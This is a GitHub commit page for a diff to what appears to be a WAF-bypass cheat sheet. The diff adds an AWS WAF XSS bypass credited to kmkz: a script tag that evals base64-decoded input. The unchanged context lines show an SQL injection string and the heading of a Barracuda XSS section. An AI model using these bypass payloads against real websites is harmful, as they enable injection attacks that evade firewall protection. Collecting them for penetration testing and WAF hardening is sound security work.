Added another AWS WAF bypass from kmkz

This commit is contained in:
Infected Drake 2019-07-27 06:26:12 +05:30 committed by GitHub
parent 95fb2d8810
commit e9b947096f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2936,6 +2936,10 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
``` ```
"; select * from TARGET_TABLE -- "; select * from TARGET_TABLE --
``` ```
- [XSS Bypass](https://github.com/kmkz/Pentesting/blob/master/Pentest-Cheat-Sheet#L285) by [@kmkz](https://twitter.com/kmkz_security)
```
<script>eval(atob(decodeURIComponent("payload")))//
```
### Barracuda ### Barracuda
- Cross Site Scripting by [@WAFNinja](https://waf.ninja) - Cross Site Scripting by [@WAFNinja](https://waf.ninja)